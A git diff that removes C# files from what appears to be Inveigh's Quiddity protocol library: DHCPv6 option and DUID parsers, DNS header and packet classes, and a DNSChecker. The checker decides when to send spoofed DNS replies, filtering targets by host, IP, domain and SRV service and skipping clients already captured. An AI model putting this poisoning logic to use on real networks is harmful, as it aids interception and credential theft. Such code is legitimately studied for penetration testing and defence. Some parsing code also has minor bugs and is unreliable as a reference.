return memoryStream.ToArray(); - } - - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option39.cs b/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option39.cs deleted file mode 100644 index b7b4a76..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option39.cs +++ /dev/null @@ -1,128 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.Support; -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.DHCPv6 -{ - class DHCPv6Option39 : DHCPv6Option - { - // https://datatracker.ietf.org/doc/html/rfc4704 - - public byte Flags { get; set; } - public string DomainName { get; set; } - - public DHCPv6Option39() - { - - } - - public DHCPv6Option39(byte[] data) - { - ReadBytes(data, 0); - } - - public DHCPv6Option39(byte[] data, int index) - { - ReadBytes(data, index); - } - - public new void ReadBytes(byte[] data, int index) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = index; - this.OptionCode = packetReader.BigEndianReadUInt16(); - this.OptionLen = packetReader.BigEndianReadUInt16(); - this.Flags = packetReader.ReadByte(); - this.DomainName = ConvertName(packetReader.ReadBytes(this.OptionLen - 1)); - } - - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.Write(this.OptionCode); - packetWriter.Write(this.OptionLen); - packetWriter.Write(this.Flags); - packetWriter.Write(this.DomainName); - return memoryStream.ToArray(); - } - - } - - protected virtual string ConvertName(byte[]data) - { - string hostname = ""; - int hostnameLength = data[0]; - int index = 0; - int i = 0; - - do - { - int hostnameSegmentLength = hostnameLength; - byte[] hostnameSegment = new byte[hostnameSegmentLength]; - Buffer.BlockCopy(data, (index + 1), hostnameSegment, 0, hostnameSegmentLength); - hostname += Encoding.UTF8.GetString(hostnameSegment); - - if (hostnameLength + 1 == data.Length) - { - return hostname; - } - - index += hostnameLength + 1; - hostnameLength = data[index]; - i++; - - if (hostnameLength > 0) - { - hostname += "."; - } - - } - while (hostnameLength != 0 && i <= 127); - - return hostname; - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option5.cs b/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option5.cs deleted file mode 100644 index 7ed7a2b..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option5.cs +++ /dev/null @@ -1,77 +0,0 @@ -using Quiddity.Support; -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Net; -using System.Text; - -namespace Quiddity.DHCPv6 -{ - class DHCPv6Option5 : DHCPv6Option - { - // https://datatracker.ietf.org/doc/html/rfc3315#section-22.6 - - public byte[] IPv6Address { get; set; } - public uint PreferredLifetime { get; set; } - public uint ValidLifetime { get; set; } - public byte[] IAAddrOptions { get; set; } - - public DHCPv6Option5() - { - } - - public DHCPv6Option5(byte[] data) - { - ReadBytes(data, 0); - } - - public DHCPv6Option5(byte[] data, int index) - { - ReadBytes(data, index); - } - - public new void ReadBytes(byte[] data, int index) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = index; - this.OptionCode = packetReader.BigEndianReadUInt16(); - this.OptionLen = packetReader.BigEndianReadUInt16(); - this.IPv6Address = packetReader.ReadBytes(16); - this.PreferredLifetime = packetReader.BigEndianReadUInt32(); - this.ValidLifetime = packetReader.BigEndianReadUInt32(); - } - - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.BigEndianWrite(this.OptionCode); - packetWriter.BigEndianWrite(this.OptionLen); - packetWriter.Write(this.IPv6Address); - packetWriter.BigEndianWrite(this.PreferredLifetime); - packetWriter.BigEndianWrite(this.ValidLifetime); - return memoryStream.ToArray(); - } - - } - - public byte[] GetBytes(string ipv6Address, uint lifeTime) - { - this.OptionCode = 5; - this.OptionLen = 24; - this.IPv6Address = IPAddress.Parse(ipv6Address).GetAddressBytes(); - this.PreferredLifetime = lifeTime; - this.ValidLifetime = lifeTime; - return GetBytes(); - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option6.cs b/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option6.cs deleted file mode 100644 index 557e089..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option6.cs +++ /dev/null @@ -1,87 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.DHCPv6 -{ - class DHCPv6Option6 : DHCPv6Option - { - public byte[] RequestedOptionCodes { get; set; } - - public DHCPv6Option6() - { - - } - - public DHCPv6Option6(byte[] data) - { - ReadBytes(data, 0); - } - - public DHCPv6Option6(byte[] data, int index) - { - ReadBytes(data, index); - } - - public new void ReadBytes(byte[] data, int index) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = index; - this.OptionCode = packetReader.BigEndianReadUInt16(); - this.OptionLen = packetReader.BigEndianReadUInt16(); - this.RequestedOptionCodes = packetReader.ReadBytes(this.OptionLen); - } - - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.Write(this.OptionCode); - packetWriter.Write(this.OptionLen); - packetWriter.Write(this.RequestedOptionCodes); - return memoryStream.ToArray(); - } - - } - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option8.cs b/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option8.cs deleted file mode 100644 index b6d522c..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/DHCPv6Option8.cs +++ /dev/null @@ -1,88 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.DHCPv6 -{ - class DHCPv6Option8 : DHCPv6Option - { - public ushort ElapsedTime { get; set; } - - public DHCPv6Option8() - { - - } - - public DHCPv6Option8(byte[] data) - { - ReadBytes(data, 0); - } - - public DHCPv6Option8(byte[] data, int index) - { - ReadBytes(data, index); - } - - public new void ReadBytes(byte[] data, int index) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = index; - this.OptionCode = packetReader.BigEndianReadUInt16(); - this.OptionLen = packetReader.BigEndianReadUInt16(); - this.ElapsedTime = packetReader.BigEndianReadUInt16(); - } - - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.Write(this.OptionCode); - packetWriter.Write(this.OptionLen); - packetWriter.Write(this.ElapsedTime); - return memoryStream.ToArray(); - } - - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/Values/DHCPv6DUIDLL.cs b/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/Values/DHCPv6DUIDLL.cs deleted file mode 100644 index a24dd45..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/Values/DHCPv6DUIDLL.cs +++ /dev/null @@ -1,72 +0,0 @@ -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.DHCPv6 -{ - public class DHCPv6DUIDLL - { - // https://datatracker.ietf.org/doc/html/rfc3315#section-9 - public ushort DUIDType { get; set; } - public ushort HardwareType { get; set; } - public byte[] LinkLayerAddress { get; set; } - - public DHCPv6DUIDLL() - { - - } - - public DHCPv6DUIDLL(byte[] data) - { - ReadBytes(data, 0); - } - - public DHCPv6DUIDLL(string linkLayerAddress) - { - byte[] linkLayerAddressData = new byte[6]; - int i = 0; - - foreach (string character in linkLayerAddress.Split(':')) - { - linkLayerAddressData[i] = Convert.ToByte(Convert.ToInt16(character, 16)); - i++; - } - - this.DUIDType = 3; - this.HardwareType = 1; - this.LinkLayerAddress = linkLayerAddressData; - } - - public void ReadBytes(byte[] data, int index) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = index; - this.DUIDType = packetReader.BigEndianReadUInt16(); - this.HardwareType = packetReader.BigEndianReadUInt16(); - this.LinkLayerAddress = packetReader.ReadBytes(6); - } - - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.BigEndianWrite(this.DUIDType); - packetWriter.BigEndianWrite(this.HardwareType); - packetWriter.Write(this.LinkLayerAddress); - return memoryStream.ToArray(); - } - - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/Values/DHCPv6DUIDLLT.cs b/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/Values/DHCPv6DUIDLLT.cs deleted file mode 100644 index 45408bd..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DHCPv6/Options/Values/DHCPv6DUIDLLT.cs +++ /dev/null @@ -1,57 +0,0 @@ -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.DHCPv6 -{ - public class DHCPv6DUIDLLT - { - // https://datatracker.ietf.org/doc/html/rfc3315#section-9 - public ushort DUIDType { get; set; } - public ushort HardwareType { get; set; } - public uint Time { get; set; } - public byte[] LinkLayerAddress { get; set; } - - public DHCPv6DUIDLLT() - { - - } - - public DHCPv6DUIDLLT(byte[] data) - { - ReadBytes(data, 0); - } - - public void ReadBytes(byte[] data, int index) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = index; - this.DUIDType = packetReader.BigEndianReadUInt16(); - this.HardwareType = packetReader.BigEndianReadUInt16(); - this.Time = packetReader.BigEndianReadUInt32(); - this.LinkLayerAddress = packetReader.ReadBytes(6); - } - - } - - public byte[] GetBytes() - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.BigEndianWrite(this.DUIDType); - packetWriter.BigEndianWrite(this.HardwareType); - packetWriter.Write(this.LinkLayerAddress); - return memoryStream.ToArray(); - } - - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DNS/DNSChecker.cs b/Inveigh/Protocols/Quiddity/Protocols/DNS/DNSChecker.cs deleted file mode 100644 index 5a23ffd..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DNS/DNSChecker.cs +++ /dev/null @@ -1,329 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.Support; -using System; -using System.Collections.Generic; - -namespace Quiddity.DNS -{ - class DNSChecker - { - public string[] IgnoreHosts { get; set; } - public string[] ReplyToHosts { get; set; } - public string[] IgnoreIPs { get; set; } - public string[] ReplyToIPs { get; set; } - public string[] IgnoreDomains { get; set; } - public string[] ReplyToDomains { get; set; } - public string[] Types { get; set; } - public string[] Services { get; set; } - public IList IPCaptures { get; set; } - public bool Enabled { get; set; } - public bool Inspect { get; set; } - public bool IPv6 { get; set; } - public bool Local { get; set; } - public bool Repeat { get; set; } - public string OutputReplyAllowed { get; set; } - public string OutputMessage { get; set; } - public string OutputInspect { get; set; } - public string OutputDisabled { get; set; } - public string OutputTypeDenied { get; set; } - public string OutputServiceDenied { get; set; } - public string OutputHostDenied { get; set; } - public string OutputIPDenied { get; set; } - public string OutputDomainDenied { get; set; } - public string OutputRepeat { get; set; } - - public DNSChecker() - { - this.OutputReplyAllowed = "response sent"; - this.OutputInspect = "inspect only"; - this.OutputDisabled = "disabled"; - this.OutputHostDenied = "host ignored"; - this.OutputIPDenied = "IP ignored"; - this.OutputDomainDenied = "domain ignored"; - this.OutputTypeDenied = "type ignored"; - this.OutputServiceDenied = "service ignored"; - this.OutputRepeat = "previous capture"; - } - - public bool Check(string name, string type, string clientIP) - { - if (this.Inspect) - { - this.OutputMessage = this.OutputInspect; - return false; - } - else if (!this.Enabled) - { - this.OutputMessage = this.OutputDisabled; - return false; - } - else if (IsRepeat(clientIP)) - { - this.OutputMessage = this.OutputRepeat; - return false; - } - else if (!TypeIsAllowed(type)) - { - this.OutputMessage = this.OutputTypeDenied; - return false; - } - else if (!ServiceIsAllowed(name, type)) - { - this.OutputMessage = this.OutputServiceDenied; - return false; - } - else if (HostIsDenied(name)) - { - this.OutputMessage = this.OutputHostDenied; - return false; - } - else if (!HostIsAllowed(name)) - { - this.OutputMessage = this.OutputIPDenied; - return false; - } - else if (FQDNIsDenied(name)) - { - this.OutputMessage = this.OutputHostDenied; - return false; - } - else if (!FQDNIsAllowed(name)) - { - this.OutputMessage = this.OutputIPDenied; - return false; - } - else if (IPIsDenied(clientIP)) - { - this.OutputMessage = this.OutputIPDenied; - return false; - } - else if (!IPIsAllowed(clientIP)) - { - this.OutputMessage = this.OutputIPDenied; - return false; - } - else if (DomainIsDenied(name)) - { - this.OutputMessage = this.OutputDomainDenied; - return false; - } - else if (!DomainIsAllowed(name)) - { - this.OutputMessage = this.OutputDomainDenied; - return false; - } - - this.OutputMessage = this.OutputReplyAllowed; - return true; - } - - public bool IsRepeat(string clientIP) - { - - if (!this.Repeat && this.IPCaptures.Contains(clientIP)) - { - return true; - } - - return false; - } - - public bool TypeIsAllowed(string type) - { - - if (!Utilities.ArrayIsNullOrEmpty(this.Types) && (!Array.Exists(this.Types, element => element == type.ToUpper()))) - { - return false; - } - - return true; - } - - public bool ServiceIsAllowed(string name, string type) - { - - if (type.Equals("SRV") && TypeIsAllowed("SRV")) - { - string service = ""; - - if (name.StartsWith("_ldap.")) - { - service = "LDAP"; - } - else if (name.StartsWith("_kerberos.")) - { - service = "Kerberos"; - } - else if (name.StartsWith("_kpassword.")) - { - service = "KPassword"; - } - else if (name.StartsWith("_gc.")) - { - service = "GC"; - } - - if (!Utilities.ArrayIsNullOrEmpty(this.Services) && (!Array.Exists(this.Services, element => element == service.ToUpper()))) - { - return false; - } - } - - return true; - } - - public bool HostIsDenied(string name) - { - string host = (name.Split('.'))[0]; - - if (!Utilities.ArrayIsNullOrEmpty(this.IgnoreHosts) && Array.Exists(this.IgnoreHosts, element => element == host.ToUpper())) - { - return true; - } - - return false; - } - - public bool HostIsAllowed(string name) - { - string host = (name.Split('.'))[0]; - - if (!Utilities.ArrayIsNullOrEmpty(this.ReplyToHosts) && !Array.Exists(this.ReplyToHosts, element => element == host.ToUpper())) - { - return false; - } - - return true; - } - - public bool FQDNIsDenied(string name) - { - - if (!Utilities.ArrayIsNullOrEmpty(this.IgnoreHosts) && Array.Exists(this.IgnoreHosts, element => element == name.ToUpper())) - { - return true; - } - - return false; - } - - public bool FQDNIsAllowed(string name) - { - - if (!Utilities.ArrayIsNullOrEmpty(this.ReplyToHosts) && !Array.Exists(this.ReplyToHosts, element => element == name.ToUpper())) - { - return false; - } - - return true; - } - - public bool IPIsDenied(string clientIP) - { - - if (!Utilities.ArrayIsNullOrEmpty(this.IgnoreIPs) && Array.Exists(this.IgnoreIPs, element => element == clientIP.ToUpper())) - { - return true; - } - - return false; - } - - public bool IPIsAllowed(string clientIP) - { - - if (!Utilities.ArrayIsNullOrEmpty(this.ReplyToIPs) && !Array.Exists(this.ReplyToIPs, element => element == clientIP.ToUpper())) - { - return false; - } - - return true; - } - - public bool DomainIsDenied(string domain) - { - int index = domain.IndexOf("."); - - while (index > -1) - { - - if (!Utilities.ArrayIsNullOrEmpty(this.IgnoreDomains) && Array.Exists(this.IgnoreDomains, element => element == domain.ToUpper())) - { - return true; - } - - - index = domain.IndexOf("."); - - if (index > -1) - { - domain = domain.Substring(index).TrimStart('.'); - } - - } - - return false; - } - - public bool DomainIsAllowed(string domain) - { - int index = domain.IndexOf("."); - - if (index == -1 || Utilities.ArrayIsNullOrEmpty(this.ReplyToDomains)) - { - return true; - } - - while (index > -1) - { - - if (Array.Exists(this.ReplyToDomains, element => element == domain.ToUpper())) - { - return true; - } - - index = domain.IndexOf("."); - - if (index > -1) - { - domain = domain.Substring(index).TrimStart('.'); - } - - } - - return false; - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DNS/DNSHeader.cs b/Inveigh/Protocols/Quiddity/Protocols/DNS/DNSHeader.cs deleted file mode 100644 index fbdde7b..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DNS/DNSHeader.cs +++ /dev/null @@ -1,169 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.IO; - -namespace Quiddity.DNS -{ - public class DNSHeader - { - // https://tools.ietf.org/html/rfc1035 - public byte[] ID { get; set; } - public bool QR { get; set; } // 1 bit - public string Opcode { get; set; } // 4 bit - public bool AA { get; set; } // 1 bit - public bool TC { get; set; } // 1 bit - public bool RD { get; set; } // 1 bit - public bool RA { get; set; } // 1 bit - public string Z { get; set; } // reserved - public string RCode { get; set; } // 4 bit - public ushort QDCount { get; set; } - public ushort ANCount { get; set; } - public ushort NSCount { get; set; } - public ushort ARCount { get; set; } - - // custom - public byte[] Flags { get; set; } - - public DNSHeader() - { - - } - - public DNSHeader(byte[] data) - { - ReadBytes(data, 0); - } - - public void ReadBytes(byte[] data, int offset) - { - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - memoryStream.Position = offset; - this.ID = packetReader.ReadBytes(2); - this.Flags = packetReader.BigEndianReadBytes(2); - this.QDCount = packetReader.BigEndianReadUInt16(); - this.ANCount = packetReader.BigEndianReadUInt16(); - this.NSCount = packetReader.BigEndianReadUInt16(); - this.ARCount = packetReader.BigEndianReadUInt16(); - } - - ReadFlags(); - } - - public byte[] GetBytes() - { - WriteFlags(); - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.Write(this.ID); - packetWriter.Write(this.Flags); - packetWriter.BigEndianWrite(this.QDCount); - packetWriter.BigEndianWrite(this.ANCount); - packetWriter.BigEndianWrite(this.NSCount); - packetWriter.BigEndianWrite(this.ARCount); - return memoryStream.ToArray(); - } - - } - - protected virtual void ReadFlags() - { - string flags = Convert.ToString(BitConverter.ToUInt16(this.Flags, 0), 2).PadLeft(16, '0'); - - if (String.Equals(flags.Substring(0, 1), "1")) - { - this.QR = true; - } - - this.Opcode = flags.Substring(1, 4); - - if (String.Equals(flags.Substring(5, 1), "1")) - { - this.AA = true; - } - - if (String.Equals(flags.Substring(6, 1), "1")) - { - this.TC = true; - } - - if (String.Equals(flags.Substring(7, 1), "1")) - { - this.RD = true; - } - - if (String.Equals(flags.Substring(7, 1), "1")) - { - this.RA = true; - } - - this.Z = flags.Substring(8, 3); - this.RCode = flags.Substring(12, 4); - } - - protected virtual void WriteFlags() - { - string flags = this.QR ? "1" : "0"; - flags += this.Opcode; - flags += this.AA ? "1" : "0"; - flags += this.TC ? "1" : "0"; - flags += this.RD ? "1" : "0"; - flags += this.RA ? "1" : "0"; - flags += this.Z; - flags += this.RCode; - byte[] bytes = new byte[2]; - - for (int i = 0; i < 2; ++i) - { - bytes[i] = Convert.ToByte(flags.Substring(8 * i, 8), 2); - } - - this.Flags = bytes; - } - - public bool IsQuery() - { - if (!this.QR && this.QDCount == 1) - { - return true; - } - - return false; - } - - } -} diff --git a/Inveigh/Protocols/Quiddity/Protocols/DNS/DNSPacket.cs b/Inveigh/Protocols/Quiddity/Protocols/DNS/DNSPacket.cs deleted file mode 100644 index b18b50b..0000000 --- a/Inveigh/Protocols/Quiddity/Protocols/DNS/DNSPacket.cs +++ /dev/null @@ -1,185 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.Support; -using System; -using System.Collections.Generic; -using System.Linq; -using System.Net; -using System.Text; - -namespace Quiddity.DNS -{ - class DNSPacket - { - public DNSHeader Header { get; set; } - public DNSQuestion Question { get; set; } - public DNSResource Resource { get; set; } - public DNSResource Additional { get; set; } - - public uint TTL { get; set; } - public string Host { get; set; 